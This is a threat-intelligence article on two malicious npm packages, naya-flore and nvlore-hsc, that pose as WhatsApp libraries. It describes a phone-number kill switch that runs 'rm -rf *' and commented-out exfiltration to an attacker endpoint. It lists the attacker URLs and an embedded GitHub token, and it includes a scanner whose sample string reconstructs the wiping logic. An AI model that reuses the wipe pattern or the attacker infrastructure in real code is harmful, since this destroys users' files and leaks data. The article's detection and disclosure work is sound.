Weaponized npm Packages Target WhatsApp Developers with Remote Kill Switch
Socket’s Threat Research Team has uncovered a sophisticated supply chain attack targeting developers integrating with the WhatsApp Business API.
Two malicious npm packages, naya-flore and nvlore-hsc, published by the npm user nayflore using the email [email protected], disguise themselves as legitimate WhatsApp socket libraries.
These packages exploit the growing ecosystem of third-party tools for WhatsApp automation, which has surged alongside the platform’s adoption by over 200 million businesses worldwide.
Developers often rely on libraries like whatsapp-web.js and baileys for building chatbots and messaging integrations, making these malicious alternatives particularly deceptive.
With over 1,110 downloads in a month, the packages remain active on the npm registry despite takedown requests submitted to the npm security team.
The attack vector leverages a remote-controlled destruction mechanism triggered by phone number verification, representing an escalation from typical data theft to outright system sabotage.
According to the report, Socket’s AI scanner detected the anomalous behavior, including obfuscated network requests and destructive commands, highlighting the packages’ intent to blend into normal development workflows while harboring catastrophic capabilities.
Remote Kill Switch
At the core of the attack is a phone number-based kill switch embedded within the packages’ requestPairingCode function, which mimics authentic WhatsApp pairing processes to lure developers.
Upon execution, the function fetches a Base64-obfuscated database of whitelisted phone numbers from a GitHub repository at https://raw.githubusercontent.com/navaLinh/database/main/seska.json.

This endpoint, decoded from strings like “aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2EuanNvbg==”, hosts a list primarily of Indonesian mobile numbers that bypass the destruction logic.
If the provided phone number matches an entry in this remotely updatable database, the package proceeds with seemingly normal WhatsApp socket operations, utilizing familiar structures like makeSocket configurations that echo legitimate libraries such as baileys.
However, for unlisted numbers, the function sets a flag to “0000” and executes the command ‘rm -rf *’, recursively deleting all files in the current directory after initial pairing appears successful.
This delayed trigger enhances stealth, allowing the package to pass cursory testing while enabling threat actors to selectively target victims based on geographic or demographic profiles.
The pairKey parameter further bolsters the illusion of legitimacy, serving no functional role in the kill switch but aligning with expected WhatsApp API patterns to evade suspicion during code reviews.
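The two traits described above (a base64 literal that decodes to a network endpoint, and a destructive shell command reachable from a "normal" function) are exactly what a dependency audit should look for. The following added example is a small static heuristic scanner written for this article, not code from Socket or from the packages; the sample source it scans is constructed to mirror the described pattern, nothing in it is executed, and the only page-specific value it uses is the base64 string quoted above.

```javascript
// Static heuristic scan for obfuscated endpoints and destructive commands.
// Text analysis only: the sample below is never evaluated or run.

const BASE64_LITERAL_RE = /['"]([A-Za-z0-9+/]{20,}={0,2})['"]/g;
const DESTRUCTIVE_RE = /\brm\s+-(?:rf|fr)\b[^'"\n]*/g;
const CHILD_PROCESS_RE = /require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/;

// Decode a base64 literal and keep it only if it is a clean, printable URL.
function decodeIfUrl(candidate) {
  const decoded = Buffer.from(candidate, "base64").toString("utf8");
  return /^https?:\/\/[\x21-\x7e]+$/.test(decoded) ? decoded : null;
}

// Scan one file's source text and collect the indicators.
function scanSource(source) {
  const findings = { decodedUrls: [], destructiveCommands: [], spawnsShell: false };
  for (const m of source.matchAll(BASE64_LITERAL_RE)) {
    const url = decodeIfUrl(m[1]);
    if (url) findings.decodedUrls.push(url);
  }
  for (const m of source.matchAll(DESTRUCTIVE_RE)) {
    findings.destructiveCommands.push(m[0].trim());
  }
  findings.spawnsShell = CHILD_PROCESS_RE.test(source);
  return findings;
}

// A destructive command, or an obfuscated endpoint combined with shell access,
// is enough to pull the dependency for manual review before it is installed.
function isSuspicious(findings) {
  return findings.destructiveCommands.length > 0 ||
    (findings.decodedUrls.length > 0 && findings.spawnsShell);
}

// Constructed sample (hypothetical, not the packages' code) mirroring the
// reported pattern: obfuscated allow-list URL, then a wipe for unlisted numbers.
const SAMPLE_SOURCE = [
  'const { execSync } = require("child_process");',
  'const db = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2EuanNvbg==";',
  'async function requestPairingCode(phoneNumber, pairKey) {',
  '  const allowed = await (await fetch(Buffer.from(db, "base64").toString())).json();',
  '  if (!allowed.includes(phoneNumber)) { flag = "0000"; execSync("rm -rf *"); }',
  '}',
].join("\n");

const report = scanSource(SAMPLE_SOURCE);
console.log(JSON.stringify(report, null, 2), "suspicious:", isSuspicious(report));
```

Run it against a package's unpacked tarball (for example over every `.js` file under `node_modules/<name>`) to triage new dependencies before they reach a build agent.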
Dormant Exfiltration
Beyond destruction, the packages include dormant data exfiltration capabilities via the generateCreeds function, which is designed to send device information including phone numbers, identifiers, and status to https://api.verylinh.my.id/running using POST requests with a Base64-encoded key ‘ZnVja19nb2Q’.
Although these calls are commented out in the current versions, their presence indicates ready infrastructure for reactivation, potentially in future iterations to collect reconnaissance data from whitelisted systems before any destructive actions.
Additionally, naya-flore embeds an unused GitHub Personal Access Token ‘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’, which could grant unauthorized access to private repositories, though its exact purpose remains unclear and may point to unfinished attack features.
The same author has published other packages like nouku-search, very-nay, naya-clone, node-smsk, and @veryflore/disc, which appear benign but demand scrutiny given the context.
This incident underscores evolving threats in niche developer communities, where attackers exploit trust in open-source ecosystems to deploy geographically targeted malware.
Organizations should audit dependencies for suspicious network activity, file system manipulations, and unnecessary sensitive inputs, while tools like Socket’s GitHub App, CLI, browser extension, and MCP can preemptively detect such risks by scanning for kill switch patterns and exfiltration attempts.
Indicators of Compromise (IOCs)
| Category | Indicators |
|---|---|
| Malicious Packages | naya-flore, nvlore-hsc |
| Network Indicators | https://api.verylinh.my.id/running, https://raw.githubusercontent.com/navaLinh/database/main/seska.json |
| Threat Actor Identifiers | npm alias: nayflore; Registration email: [email protected]; GitHub PAT: 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 |